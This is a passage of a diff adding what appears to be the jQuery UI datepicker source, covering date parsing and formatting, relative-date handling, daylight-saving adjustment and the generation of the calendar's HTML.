|
8084 |
+
case "'":
|
8085 |
+
if (lookAhead("'"))
|
8086 |
+
checkLiteral();
|
8087 |
+
else
|
8088 |
+
literal = true;
|
8089 |
+
break;
|
8090 |
+
default:
|
8091 |
+
checkLiteral();
|
8092 |
+
}
|
8093 |
+
}
|
8094 |
+
if (iValue < value.length){
|
8095 |
+
throw "Extra/unparsed characters found in date: " + value.substring(iValue);
|
8096 |
+
}
|
8097 |
+
if (year == -1)
|
8098 |
+
year = new Date().getFullYear();
|
8099 |
+
else if (year < 100)
|
8100 |
+
year += new Date().getFullYear() - new Date().getFullYear() % 100 +
|
8101 |
+
(year <= shortYearCutoff ? 0 : -100);
|
8102 |
+
if (doy > -1) {
|
8103 |
+
month = 1;
|
8104 |
+
day = doy;
|
8105 |
+
do {
|
8106 |
+
var dim = this._getDaysInMonth(year, month - 1);
|
8107 |
+
if (day <= dim)
|
8108 |
+
break;
|
8109 |
+
month++;
|
8110 |
+
day -= dim;
|
8111 |
+
} while (true);
|
8112 |
+
}
|
8113 |
+
var date = this._daylightSavingAdjust(new Date(year, month - 1, day));
|
8114 |
+
if (date.getFullYear() != year || date.getMonth() + 1 != month || date.getDate() != day)
|
8115 |
+
throw 'Invalid date'; // E.g. 31/02/00
|
8116 |
+
return date;
|
8117 |
+
},
|
8118 |
+
|
8119 |
+
/* Standard date formats. */
|
8120 |
+
ATOM: 'yy-mm-dd', // RFC 3339 (ISO 8601)
|
8121 |
+
COOKIE: 'D, dd M yy',
|
8122 |
+
ISO_8601: 'yy-mm-dd',
|
8123 |
+
RFC_822: 'D, d M y',
|
8124 |
+
RFC_850: 'DD, dd-M-y',
|
8125 |
+
RFC_1036: 'D, d M y',
|
8126 |
+
RFC_1123: 'D, d M yy',
|
8127 |
+
RFC_2822: 'D, d M yy',
|
8128 |
+
RSS: 'D, d M y', // RFC 822
|
8129 |
+
TICKS: '!',
|
8130 |
+
TIMESTAMP: '@',
|
8131 |
+
W3C: 'yy-mm-dd', // ISO 8601
|
8132 |
+
|
8133 |
+
_ticksTo1970: (((1970 - 1) * 365 + Math.floor(1970 / 4) - Math.floor(1970 / 100) +
|
8134 |
+
Math.floor(1970 / 400)) * 24 * 60 * 60 * 10000000),
|
8135 |
+
|
8136 |
+
/* Format a date object into a string value.
|
8137 |
+
The format can be combinations of the following:
|
8138 |
+
d - day of month (no leading zero)
|
8139 |
+
dd - day of month (two digit)
|
8140 |
+
o - day of year (no leading zeros)
|
8141 |
+
oo - day of year (three digit)
|
8142 |
+
D - day name short
|
8143 |
+
DD - day name long
|
8144 |
+
m - month of year (no leading zero)
|
8145 |
+
mm - month of year (two digit)
|
8146 |
+
M - month name short
|
8147 |
+
MM - month name long
|
8148 |
+
y - year (two digit)
|
8149 |
+
yy - year (four digit)
|
8150 |
+
@ - Unix timestamp (ms since 01/01/1970)
|
8151 |
+
! - Windows ticks (100ns since 01/01/0001)
|
8152 |
+
'...' - literal text
|
8153 |
+
'' - single quote
|
8154 |
+
|
8155 |
+
@param format string - the desired format of the date
|
8156 |
+
@param date Date - the date value to format
|
8157 |
+
@param settings Object - attributes include:
|
8158 |
+
dayNamesShort string[7] - abbreviated names of the days from Sunday (optional)
|
8159 |
+
dayNames string[7] - names of the days from Sunday (optional)
|
8160 |
+
monthNamesShort string[12] - abbreviated names of the months (optional)
|
8161 |
+
monthNames string[12] - names of the months (optional)
|
8162 |
+
@return string - the date in the above format */
|
8163 |
+
formatDate: function (format, date, settings) {
|
8164 |
+
if (!date)
|
8165 |
+
return '';
|
8166 |
+
var dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort;
|
8167 |
+
var dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames;
|
8168 |
+
var monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort;
|
8169 |
+
var monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames;
|
8170 |
+
// Check whether a format character is doubled
|
8171 |
+
var lookAhead = function(match) {
|
8172 |
+
var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) == match);
|
8173 |
+
if (matches)
|
8174 |
+
iFormat++;
|
8175 |
+
return matches;
|
8176 |
+
};
|
8177 |
+
// Format a number, with leading zero if necessary
|
8178 |
+
var formatNumber = function(match, value, len) {
|
8179 |
+
var num = '' + value;
|
8180 |
+
if (lookAhead(match))
|
8181 |
+
while (num.length < len)
|
8182 |
+
num = '0' + num;
|
8183 |
+
return num;
|
8184 |
+
};
|
8185 |
+
// Format a name, short or long as requested
|
8186 |
+
var formatName = function(match, value, shortNames, longNames) {
|
8187 |
+
return (lookAhead(match) ? longNames[value] : shortNames[value]);
|
8188 |
+
};
|
8189 |
+
var output = '';
|
8190 |
+
var literal = false;
|
8191 |
+
if (date)
|
8192 |
+
for (var iFormat = 0; iFormat < format.length; iFormat++) {
|
8193 |
+
if (literal)
|
8194 |
+
if (format.charAt(iFormat) == "'" && !lookAhead("'"))
|
8195 |
+
literal = false;
|
8196 |
+
else
|
8197 |
+
output += format.charAt(iFormat);
|
8198 |
+
else
|
8199 |
+
switch (format.charAt(iFormat)) {
|
8200 |
+
case 'd':
|
8201 |
+
output += formatNumber('d', date.getDate(), 2);
|
8202 |
+
break;
|
8203 |
+
case 'D':
|
8204 |
+
output += formatName('D', date.getDay(), dayNamesShort, dayNames);
|
8205 |
+
break;
|
8206 |
+
case 'o':
|
8207 |
+
output += formatNumber('o',
|
8208 |
+
Math.round((new Date(date.getFullYear(), date.getMonth(), date.getDate()).getTime() - new Date(date.getFullYear(), 0, 0).getTime()) / 86400000), 3);
|
8209 |
+
break;
|
8210 |
+
case 'm':
|
8211 |
+
output += formatNumber('m', date.getMonth() + 1, 2);
|
8212 |
+
break;
|
8213 |
+
case 'M':
|
8214 |
+
output += formatName('M', date.getMonth(), monthNamesShort, monthNames);
|
8215 |
+
break;
|
8216 |
+
case 'y':
|
8217 |
+
output += (lookAhead('y') ? date.getFullYear() :
|
8218 |
+
(date.getYear() % 100 < 10 ? '0' : '') + date.getYear() % 100);
|
8219 |
+
break;
|
8220 |
+
case '@':
|
8221 |
+
output += date.getTime();
|
8222 |
+
break;
|
8223 |
+
case '!':
|
8224 |
+
output += date.getTime() * 10000 + this._ticksTo1970;
|
8225 |
+
break;
|
8226 |
+
case "'":
|
8227 |
+
if (lookAhead("'"))
|
8228 |
+
output += "'";
|
8229 |
+
else
|
8230 |
+
literal = true;
|
8231 |
+
break;
|
8232 |
+
default:
|
8233 |
+
output += format.charAt(iFormat);
|
8234 |
+
}
|
8235 |
+
}
|
8236 |
+
return output;
|
8237 |
+
},
|
8238 |
+
|
8239 |
+
/* Extract all possible characters from the date format. */
|
8240 |
+
_possibleChars: function (format) {
|
8241 |
+
var chars = '';
|
8242 |
+
var literal = false;
|
8243 |
+
// Check whether a format character is doubled
|
8244 |
+
var lookAhead = function(match) {
|
8245 |
+
var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) == match);
|
8246 |
+
if (matches)
|
8247 |
+
iFormat++;
|
8248 |
+
return matches;
|
8249 |
+
};
|
8250 |
+
for (var iFormat = 0; iFormat < format.length; iFormat++)
|
8251 |
+
if (literal)
|
8252 |
+
if (format.charAt(iFormat) == "'" && !lookAhead("'"))
|
8253 |
+
literal = false;
|
8254 |
+
else
|
8255 |
+
chars += format.charAt(iFormat);
|
8256 |
+
else
|
8257 |
+
switch (format.charAt(iFormat)) {
|
8258 |
+
case 'd': case 'm': case 'y': case '@':
|
8259 |
+
chars += '0123456789';
|
8260 |
+
break;
|
8261 |
+
case 'D': case 'M':
|
8262 |
+
return null; // Accept anything
|
8263 |
+
case "'":
|
8264 |
+
if (lookAhead("'"))
|
8265 |
+
chars += "'";
|
8266 |
+
else
|
8267 |
+
literal = true;
|
8268 |
+
break;
|
8269 |
+
default:
|
8270 |
+
chars += format.charAt(iFormat);
|
8271 |
+
}
|
8272 |
+
return chars;
|
8273 |
+
},
|
8274 |
+
|
8275 |
+
/* Get a setting value, defaulting if necessary. */
|
8276 |
+
_get: function(inst, name) {
|
8277 |
+
return inst.settings[name] !== undefined ?
|
8278 |
+
inst.settings[name] : this._defaults[name];
|
8279 |
+
},
|
8280 |
+
|
8281 |
+
/* Parse existing date and initialise date picker. */
|
8282 |
+
_setDateFromField: function(inst, noDefault) {
|
8283 |
+
if (inst.input.val() == inst.lastVal) {
|
8284 |
+
return;
|
8285 |
+
}
|
8286 |
+
var dateFormat = this._get(inst, 'dateFormat');
|
8287 |
+
var dates = inst.lastVal = inst.input ? inst.input.val() : null;
|
8288 |
+
var date, defaultDate;
|
8289 |
+
date = defaultDate = this._getDefaultDate(inst);
|
8290 |
+
var settings = this._getFormatConfig(inst);
|
8291 |
+
try {
|
8292 |
+
date = this.parseDate(dateFormat, dates, settings) || defaultDate;
|
8293 |
+
} catch (event) {
|
8294 |
+
this.log(event);
|
8295 |
+
dates = (noDefault ? '' : dates);
|
8296 |
+
}
|
8297 |
+
inst.selectedDay = date.getDate();
|
8298 |
+
inst.drawMonth = inst.selectedMonth = date.getMonth();
|
8299 |
+
inst.drawYear = inst.selectedYear = date.getFullYear();
|
8300 |
+
inst.currentDay = (dates ? date.getDate() : 0);
|
8301 |
+
inst.currentMonth = (dates ? date.getMonth() : 0);
|
8302 |
+
inst.currentYear = (dates ? date.getFullYear() : 0);
|
8303 |
+
this._adjustInstDate(inst);
|
8304 |
+
},
|
8305 |
+
|
8306 |
+
/* Retrieve the default date shown on opening. */
|
8307 |
+
_getDefaultDate: function(inst) {
|
8308 |
+
return this._restrictMinMax(inst,
|
8309 |
+
this._determineDate(inst, this._get(inst, 'defaultDate'), new Date()));
|
8310 |
+
},
|
8311 |
+
|
8312 |
+
/* A date may be specified as an exact value or a relative one. */
|
8313 |
+
_determineDate: function(inst, date, defaultDate) {
|
8314 |
+
var offsetNumeric = function(offset) {
|
8315 |
+
var date = new Date();
|
8316 |
+
date.setDate(date.getDate() + offset);
|
8317 |
+
return date;
|
8318 |
+
};
|
8319 |
+
var offsetString = function(offset) {
|
8320 |
+
try {
|
8321 |
+
return $.datepicker.parseDate($.datepicker._get(inst, 'dateFormat'),
|
8322 |
+
offset, $.datepicker._getFormatConfig(inst));
|
8323 |
+
}
|
8324 |
+
catch (e) {
|
8325 |
+
// Ignore
|
8326 |
+
}
|
8327 |
+
var date = (offset.toLowerCase().match(/^c/) ?
|
8328 |
+
$.datepicker._getDate(inst) : null) || new Date();
|
8329 |
+
var year = date.getFullYear();
|
8330 |
+
var month = date.getMonth();
|
8331 |
+
var day = date.getDate();
|
8332 |
+
var pattern = /([+-]?[0-9]+)\s*(d|D|w|W|m|M|y|Y)?/g;
|
8333 |
+
var matches = pattern.exec(offset);
|
8334 |
+
while (matches) {
|
8335 |
+
switch (matches[2] || 'd') {
|
8336 |
+
case 'd' : case 'D' :
|
8337 |
+
day += parseInt(matches[1],10); break;
|
8338 |
+
case 'w' : case 'W' :
|
8339 |
+
day += parseInt(matches[1],10) * 7; break;
|
8340 |
+
case 'm' : case 'M' :
|
8341 |
+
month += parseInt(matches[1],10);
|
8342 |
+
day = Math.min(day, $.datepicker._getDaysInMonth(year, month));
|
8343 |
+
break;
|
8344 |
+
case 'y': case 'Y' :
|
8345 |
+
year += parseInt(matches[1],10);
|
8346 |
+
day = Math.min(day, $.datepicker._getDaysInMonth(year, month));
|
8347 |
+
break;
|
8348 |
+
}
|
8349 |
+
matches = pattern.exec(offset);
|
8350 |
+
}
|
8351 |
+
return new Date(year, month, day);
|
8352 |
+
};
|
8353 |
+
var newDate = (date == null || date === '' ? defaultDate : (typeof date == 'string' ? offsetString(date) :
|
8354 |
+
(typeof date == 'number' ? (isNaN(date) ? defaultDate : offsetNumeric(date)) : new Date(date.getTime()))));
|
8355 |
+
newDate = (newDate && newDate.toString() == 'Invalid Date' ? defaultDate : newDate);
|
8356 |
+
if (newDate) {
|
8357 |
+
newDate.setHours(0);
|
8358 |
+
newDate.setMinutes(0);
|
8359 |
+
newDate.setSeconds(0);
|
8360 |
+
newDate.setMilliseconds(0);
|
8361 |
+
}
|
8362 |
+
return this._daylightSavingAdjust(newDate);
|
8363 |
+
},
|
8364 |
+
|
8365 |
+
/* Handle switch to/from daylight saving.
|
8366 |
+
Hours may be non-zero on daylight saving cut-over:
|
8367 |
+
> 12 when midnight changeover, but then cannot generate
|
8368 |
+
midnight datetime, so jump to 1AM, otherwise reset.
|
8369 |
+
@param date (Date) the date to check
|
8370 |
+
@return (Date) the corrected date */
|
8371 |
+
_daylightSavingAdjust: function(date) {
|
8372 |
+
if (!date) return null;
|
8373 |
+
date.setHours(date.getHours() > 12 ? date.getHours() + 2 : 0);
|
8374 |
+
return date;
|
8375 |
+
},
|
8376 |
+
|
8377 |
+
/* Set the date(s) directly. */
|
8378 |
+
_setDate: function(inst, date, noChange) {
|
8379 |
+
var clear = !date;
|
8380 |
+
var origMonth = inst.selectedMonth;
|
8381 |
+
var origYear = inst.selectedYear;
|
8382 |
+
var newDate = this._restrictMinMax(inst, this._determineDate(inst, date, new Date()));
|
8383 |
+
inst.selectedDay = inst.currentDay = newDate.getDate();
|
8384 |
+
inst.drawMonth = inst.selectedMonth = inst.currentMonth = newDate.getMonth();
|
8385 |
+
inst.drawYear = inst.selectedYear = inst.currentYear = newDate.getFullYear();
|
8386 |
+
if ((origMonth != inst.selectedMonth || origYear != inst.selectedYear) && !noChange)
|
8387 |
+
this._notifyChange(inst);
|
8388 |
+
this._adjustInstDate(inst);
|
8389 |
+
if (inst.input) {
|
8390 |
+
inst.input.val(clear ? '' : this._formatDate(inst));
|
8391 |
+
}
|
8392 |
+
},
|
8393 |
+
|
8394 |
+
/* Retrieve the date(s) directly. */
|
8395 |
+
_getDate: function(inst) {
|
8396 |
+
var startDate = (!inst.currentYear || (inst.input && inst.input.val() == '') ? null :
|
8397 |
+
this._daylightSavingAdjust(new Date(
|
8398 |
+
inst.currentYear, inst.currentMonth, inst.currentDay)));
|
8399 |
+
return startDate;
|
8400 |
+
},
|
8401 |
+
|
8402 |
+
/* Generate the HTML for the current state of the date picker. */
|
8403 |
+
_generateHTML: function(inst) {
|
8404 |
+
var today = new Date();
|
8405 |
+
today = this._daylightSavingAdjust(
|
8406 |
+
new Date(today.getFullYear(), today.getMonth(), today.getDate())); // clear time
|
8407 |
+
var isRTL = this._get(inst, 'isRTL');
|
8408 |
+
var showButtonPanel = this._get(inst, 'showButtonPanel');
|
8409 |
+
var hideIfNoPrevNext = this._get(inst, 'hideIfNoPrevNext');
|
8410 |
+
var navigationAsDateFormat = this._get(inst, 'navigationAsDateFormat');
|
8411 |
+
var numMonths = this._getNumberOfMonths(inst);
|
8412 |
+
var showCurrentAtPos = this._get(inst, 'showCurrentAtPos');
|
8413 |
+
var stepMonths = this._get(inst, 'stepMonths');
|
8414 |
+
var isMultiMonth = (numMonths[0] != 1 || numMonths[1] != 1);
|
8415 |
+
var currentDate = this._daylightSavingAdjust((!inst.currentDay ? new Date(9999, 9, 9) :
|
8416 |
+
new Date(inst.currentYear, inst.currentMonth, inst.currentDay)));
|
8417 |
+
var minDate = this._getMinMaxDate(inst, 'min');
|
8418 |
+
var maxDate = this._getMinMaxDate(inst, 'max');
|
8419 |
+
var drawMonth = inst.drawMonth - showCurrentAtPos;
|
8420 |
+
var drawYear = inst.drawYear;
|
8421 |
+
if (drawMonth < 0) {
|
8422 |
+
drawMonth += 12;
|
8423 |
+
drawYear--;
|
8424 |
+
}
|
8425 |
+
if (maxDate) {
|
8426 |
+
var maxDraw = this._daylightSavingAdjust(new Date(maxDate.getFullYear(),
|
8427 |
+
maxDate.getMonth() - (numMonths[0] * numMonths[1]) + 1, maxDate.getDate()));
|
8428 |
+
maxDraw = (minDate && maxDraw < minDate ? minDate : maxDraw);
|
8429 |
+
while (this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1)) > maxDraw) {
|
8430 |
+
drawMonth--;
|
8431 |
+
if (drawMonth < 0) {
|
8432 |
+
drawMonth = 11;
|
8433 |
+
drawYear--;
|
8434 |
+
}
|
8435 |
+
}
|
8436 |
+
}
|
8437 |
+
inst.drawMonth = drawMonth;
|
8438 |
+
inst.drawYear = drawYear;
|
8439 |
+
var prevText = this._get(inst, 'prevText');
|
8440 |
+
prevText = (!navigationAsDateFormat ? prevText : this.formatDate(prevText,
|
8441 |
+
this._daylightSavingAdjust(new Date(drawYear, drawMonth - stepMonths, 1)),
|
8442 |
+
this._getFormatConfig(inst)));
|
8443 |
+
var prev = (this._canAdjustMonth(inst, -1, drawYear, drawMonth) ?
|
8444 |
+
'<a class="ui-datepicker-prev ui-corner-all" onclick="DP_jQuery_' + dpuuid +
|
8445 |
+
'.datepicker._adjustDate(\'#' + inst.id + '\', -' + stepMonths + ', \'M\');"' +
|
8446 |
+
' title="' + prevText + '"><span class="ui-icon ui-icon-circle-triangle-' + ( isRTL ? 'e' : 'w') + '">' + prevText + '</span></a>' :
|
8447 |
+
(hideIfNoPrevNext ? '' : '<a class="ui-datepicker-prev ui-corner-all ui-state-disabled" title="'+ prevText +'"><span class="ui-icon ui-icon-circle-triangle-' + ( isRTL ? 'e' : 'w') + '">' + prevText + '</span></a>'));
|
8448 |
+
var nextText = this._get(inst, 'nextText');
|
8449 |
+
nextText = (!navigationAsDateFormat ? nextText : this.formatDate(nextText,
|
8450 |
+
this._daylightSavingAdjust(new Date(drawYear, drawMonth + stepMonths, 1)),
|
8451 |
+
this._getFormatConfig(inst)));
|
8452 |
+
var next = (this._canAdjustMonth(inst, +1, drawYear, drawMonth) ?
|
8453 |
+
'<a class="ui-datepicker-next ui-corner-all" onclick="DP_jQuery_' + dpuuid +
|
8454 |
+
'.datepicker._adjustDate(\'#' + inst.id + '\', +' + stepMonths + ', \'M\');"' +
|
8455 |
+
' title="' + nextText + '"><span class="ui-icon ui-icon-circle-triangle-' + ( isRTL ? 'w' : 'e') + '">' + nextText + '</span></a>' :
|
8456 |
+
(hideIfNoPrevNext ? '' : '<a class="ui-datepicker-next ui-corner-all ui-state-disabled" title="'+ nextText + '"><span class="ui-icon ui-icon-circle-triangle-' + ( isRTL ? 'w' : 'e') + '">' + nextText + '</span></a>'));
|
8457 |
+
var currentText = this._get(inst, 'currentText');
|
8458 |
+
var gotoDate = (this._get(inst, 'gotoCurrent') && inst.currentDay ? currentDate : today);
|
8459 |
+
currentText = (!navigationAsDateFormat ? currentText :
|
8460 |
+
this.formatDate(currentText, gotoDate, this._getFormatConfig(inst)));
|
8461 |
+
var controls = (!inst.inline ? '<button type="button" class="ui-datepicker-close ui-state-default ui-priority-primary ui-corner-all" onclick="DP_jQuery_' + dpuuid +
|
8462 |
+
'.datepicker._hideDatepicker();">' + this._get(inst, 'closeText') + '</button>' : '');
|
8463 |
+
var buttonPanel = (showButtonPanel) ? '<div class="ui-datepicker-buttonpane ui-widget-content">' + (isRTL ? controls : '') +
|
8464 |
+
(this._isInRange(inst, gotoDate) ? '<button type="button" class="ui-datepicker-current ui-state-default ui-priority-secondary ui-corner-all" onclick="DP_jQuery_' + dpuuid +
|
8465 |
+
'.datepicker._gotoToday(\'#' + inst.id + '\');"' +
|
8466 |
+
'>' + currentText + '</button>' : '') + (isRTL ? '' : controls) + '</div>' : '';
|
8467 |
+
var firstDay = parseInt(this._get(inst, 'firstDay'),10);
|
8468 |
+
firstDay = (isNaN(firstDay) ? 0 : firstDay);
|
8469 |
+
var showWeek = this._get(inst, 'showWeek');
|
8470 |
+
var dayNames = this._get(inst, 'dayNames');
|
8471 |
+
var dayNamesShort = this._get(inst, 'dayNamesShort');
|
8472 |
+
var dayNamesMin = this._get(inst, 'dayNamesMin');
|
8473 |
+
var monthNames = this._get(inst, 'monthNames');
|
8474 |
+
var monthNamesShort = this._get(inst, 'monthNamesShort');
|
8475 |
+
var beforeShowDay = this._get(inst, 'beforeShowDay');
|
8476 |
+
var showOtherMonths = this._get(inst, 'showOtherMonths');
|
8477 |
+
var selectOtherMonths = this._get(inst, 'selectOtherMonths');
|
8478 |
+
var calculateWeek = this._get(inst, 'calculateWeek') || this.iso8601Week;
|
8479 |
+
var defaultDate = this._getDefaultDate(inst);
|
8480 |
+
var html = '';
|
8481 |
+
for (var row = 0; row < numMonths[0]; row++) {
|
8482 |
+
var group = '';
|
8483 |
+
this.maxRows = 4;
|
8484 |
+
for (var col = 0; col < numMonths[1]; col++) {
|
8485 |
+
var selectedDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, inst.selectedDay));
|
8486 |
+
var cornerClass = ' ui-corner-all';
|
8487 |
+
var calender = '';
|
8488 |
+
if (isMultiMonth) {
|
8489 |
+
calender += '<div class="ui-datepicker-group';
|
8490 |
+
if (numMonths[1] > 1)
|
8491 |
+
switch (col) {
|
8492 |
+
case 0: calender += ' ui-datepicker-group-first';
|
8493 |
+
cornerClass = ' ui-corner-' + (isRTL ? 'right' : 'left'); break;
|
8494 |
+
case numMonths[1]-1: calender += ' ui-datepicker-group-last';
|
8495 |
+
cornerClass = ' ui-corner-' + (isRTL ? 'left' : 'right'); break;
|
8496 |
+
default: calender += ' ui-datepicker-group-middle'; cornerClass = ''; break;
|
8497 |
+
}
|
8498 |
+
calender += '">';
|
8499 |
+
}
|
8500 |
+
calender += '<div class="ui-datepicker-header ui-widget-header ui-helper-clearfix' + cornerClass + '">' +
|
8501 |
+
(/all|left/.test(cornerClass) && row == 0 ? (isRTL ? next : prev) : '') +
|
8502 |
+
(/all|right/.test(cornerClass) && row == 0 ? (isRTL ? prev : next) : '') +
|
8503 |
+
this._generateMonthYearHeader(inst, drawMonth, drawYear, minDate, maxDate,
|
8504 |
+
row > 0 || col > 0, monthNames, monthNamesShort) + // draw month headers
|
8505 |
+
'</div><table class="ui-datepicker-calendar"><thead>' +
|
8506 |
+
'<tr>';
|
8507 |
+
var thead = (showWeek ? '<th class="ui-datepicker-week-col">' + this._get(inst, 'weekHeader') + '</th>' : '');
|
8508 |
+
for (var dow = 0; dow < 7; dow++) { // days of the week
|
8509 |
+
var day = (dow + firstDay) % 7;
|
8510 |
+
thead += '<th' + ((dow + firstDay + 6) % 7 >= 5 ? ' class="ui-datepicker-week-end"' : '') + '>' +
|
8511 |
+
'<span title="' + dayNames[day] + '">' + dayNamesMin[day] + '</span></th>';
|
8512 |
+
}
|
8513 |
+
calender += thead + '</tr></thead><tbody>';
|
8514 |
+
var daysInMonth = this._getDaysInMonth(drawYear, drawMonth);
|
8515 |
+
if (drawYear == inst.selectedYear && drawMonth == inst.selectedMonth)
|
8516 |
+
inst.selectedDay = Math.min(inst.selectedDay, daysInMonth);
|
8517 |
+
var leadDays = (this._getFirstDayOfMonth(drawYear, drawMonth) - firstDay + 7) % 7;
|
8518 |
+
var curRows = Math.ceil((leadDays + daysInMonth) / 7); // calculate the number of rows to generate
|
8519 |
+
var numRows = (isMultiMonth ? this.maxRows > curRows ? this.maxRows : curRows : curRows); //If multiple months, use the higher number of rows (see #7043)
|
8520 |
+
this.maxRows = numRows;
|
8521 |
+
var printDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1 - leadDays));
|
8522 |
+
for (var dRow = 0; dRow < numRows; dRow++) { // create date picker rows
|
8523 |
+
calender += '<tr>';
|
8524 |
+
var tbody = (!showWeek ? '' : '<td class="ui-datepicker-week-col">' +
|
8525 |
+
this._get(inst, 'calculateWeek')(printDate) + '</td>');
|
8526 |
+
for (var dow = 0; dow < 7; dow++) { // create date picker days
|
8527 |
+
var daySettings = (beforeShowDay ?
|
8528 |
+
beforeShowDay.apply((inst.input ? inst.input[0] : null), [printDate]) : [true, '']);
|
8529 |
+
var otherMonth = (printDate.getMonth() != drawMonth);
|
8530 |
+
var unselectable = (otherMonth && !selectOtherMonths) || !daySettings[0] ||
|
8531 |
+
(minDate && printDate < minDate) || (maxDate && printDate > maxDate);
|
8532 |
+
tbody += '<td class="' +
|
8533 |
+
((dow + firstDay + 6) % 7 >= 5 ? ' ui-datepicker-week-end' : '') + // highlight weekends
|
8534 |
+
(otherMonth ? ' ui-datepicker-other-month' : '') + // highlight days from other months
|
8535 |
+
((printDate.getTime() == selectedDate.getTime() && drawMonth == inst.selectedMonth && inst._keyEvent) || // user pressed key
|
8536 |
+
(defaultDate.getTime() == printDate.getTime() && defaultDate.getTime() == selectedDate.getTime()) ?
|
8537 |
+
// or defaultDate is current printedDate and defaultDate is selectedDate
|
8538 |
+
' ' + this._dayOverClass : '') + // highlight selected day
|
8539 |
+
(unselectable ? ' ' + this._unselectableClass + ' ui-state-disabled': '') + // highlight unselectable days
|
8540 |
+
(otherMonth && !showOtherMonths ? '' : ' ' + daySettings[1] + // highlight custom dates
|
8541 |
+
(printDate.getTime() == currentDate.getTime() ? ' ' + this._currentClass : '') + // highlight selected day
|
8542 |
+
(printDate.getTime() == today.getTime() ? ' ui-datepicker-today' : '')) + '"' + // highlight today (if different)
|
8543 |
+
((!otherMonth || showOtherMonths) && daySettings[2] ? ' title="' + daySettings[2] + '"' : '') + // cell title
|
8544 |
+
(unselectable ? '' : ' onclick="DP_jQuery_' + dpuuid + '.datepicker._selectDay(\'#' +
|
8545 |
+
inst.id + '\',' + printDate.getMonth() + ',' + printDate.getFullYear() + ', this);return false;"') + '>' + // actions
|
8546 |
+
(otherMonth && !showOtherMonths ? ' ' : // display for other months
|
8547 |
+
(unselectable ? '<span class="ui-state-default">' + printDate.getDate() + '</span>' : '<a class="ui-state-default' +
|
8548 |
+
(printDate.getTime() == today.getTime() ? ' ui-state-highlight' : '') +
|
8549 |
+
(printDate.getTime() == currentDate.getTime() ? ' ui-state-active' : '') + // highlight selected day
|
8550 |
+
(otherMonth ? ' ui-priority-secondary' : '') + // distinguish dates from other months
|
8551 |
+
'" href="#">' + printDate.getDate() + '</a>')) + '</td>'; // display selectable date
|
8552 |
+
printDate.setDate(printDate.getDate() + 1);
|
8553 |
+
printDate = this._daylightSavingAdjust(printDate);
|
8554 |
+
}
|
8555 |
+
calender += tbody + '</tr>';
|
8556 |
+
}
|
8557 |
+
drawMonth++;
|
8558 |
+
if (drawMonth > 11) {
|
8559 |
+
drawMonth = 0;
|
8560 |
+
drawYear++;
|
8561 |
+
}
|
8562 |
+
calender += '</tbody></table>' + (isMultiMonth ? '</div>' +
|
8563 |
+
((numMonths[0] > 0 && col == numMonths[1]-1) ? '<div class="ui-datepicker-row-break"></div>' : '') : '');
|
8564 |
+
group += calender;
|
8565 |
+
}
|
8566 |
+
html += group;
|
8567 |
+
}
|
8568 |
+
html += buttonPanel + ($.browser.msie && parseInt($.browser.version,10) < 7 && !inst.inline ?
|
8569 |
+
'<iframe src="javascript:false;" class="ui-datepicker-cover" frameborder="0"></iframe>' : '');
|
8570 |
+
inst._keyEvent = false;
|
8571 |
+
return html;
|
8572 |
+
},
|
8573 |
+
|
8574 |
+
/* Generate the month and year header. */
|
8575 |
+
_generateMonthYearHeader: function(inst, drawMonth, drawYear, minDate, maxDate,
|
8576 |
+
secondary, monthNames, monthNamesShort) {
|
8577 |
+
var changeMonth = this._get(inst, 'changeMonth');
|
8578 |
+
var changeYear = this._get(inst, 'changeYear');
|
8579 |
+
var showMonthAfterYear = this._get(inst, 'showMonthAfterYear');
|
8580 |
+
var html = '<div class="ui-datepicker-title">';
|
8581 |
+
var monthHtml = '';
|
8582 |
+
// month selection
|
8583 |
+
if (secondary || !changeMonth)
|
8584 |
+
monthHtml += '<span class="ui-datepicker-month">' + monthNames[drawMonth] + '</span>';
|
8585 |
+
else {
|
8586 |
+
var inMinYear = (minDate && minDate.getFullYear() == drawYear);
|
8587 |
+
var inMaxYear = (maxDate && maxDate.getFullYear() == drawYear);
|
8588 |
+
monthHtml += '<select class="ui-datepicker-month" ' +
|
8589 |
+
'onchange="DP_jQuery_' + dpuuid + '.datepicker._selectMonthYear(\'#' + inst.id + '\', this, \'M\');" ' +
|
8590 |
+
'>';
|
8591 |
+
for (var month = 0; month < 12; month++) {
|
8592 |
+
if ((!inMinYear || month >= minDate.getMonth()) &&
|
8593 |
+
(!inMaxYear || month <= maxDate.getMonth()))
|
8594 |
+
monthHtml += '<option value="' + month + '"' +
|
8595 |
+
(month == drawMonth ? ' selected="selected"' : '') +
|
8596 |
+
'>' + monthNamesShort[month] + '</option>';
|
8597 |
+
}
|
8598 |
+
monthHtml += '</select>';
|
8599 |
+
}
|
8600 |
+
if (!showMonthAfterYear)
|
8601 |
+
html += monthHtml + (secondary || !(changeMonth && changeYear) ? ' ' : '');
|
8602 |
+
// year selection
|
8603 |
+
if ( !inst.yearshtml ) {
|
8604 |
+
inst.yearshtml = '';
|
8605 |
+
if (secondary || !changeYear)
|
8606 |
+
html += '<span class="ui-datepicker-year">' + drawYear + '</span>';
|
8607 |
+
else {
|
8608 |
+
// determine range of years to display
|
8609 |
+
var years = this._get(inst, 'yearRange').split(':');
|
8610 |
+
var thisYear = new Date().getFullYear();
|
8611 |
+
var determineYear = function(value) {
|
8612 |
+
var year = (value.match(/c[+-].*/) ? drawYear + parseInt(value.substring(1), 10) :
|
8613 |
+
(value.match(/[+-].*/) ? thisYear + parseInt(value, 10) :
|
8614 |
+
parseInt(value, 10)));
|
8615 |
+
return (isNaN(year) ? thisYear : year);
|
8616 |
+
};
|
8617 |
+
var year = determineYear(years[0]);
|
8618 |
+
var endYear = Math.max(year, determineYear(years[1] || ''));
|
8619 |
+
year = (minDate ? Math.max(year, minDate.getFullYear()) : year);
|
8620 |
+
endYear = (maxDate ? Math.min(endYear, maxDate.getFullYear()) : endYear);
|
8621 |
+
inst.yearshtml += '<select class="ui-datepicker-year" ' +
|
8622 |
+
'onchange="DP_jQuery_' + dpuuid + '.datepicker._selectMonthYear(\'#' + inst.id + '\', this, \'Y\');" ' +
|
8623 |
+
'>';
|
8624 |
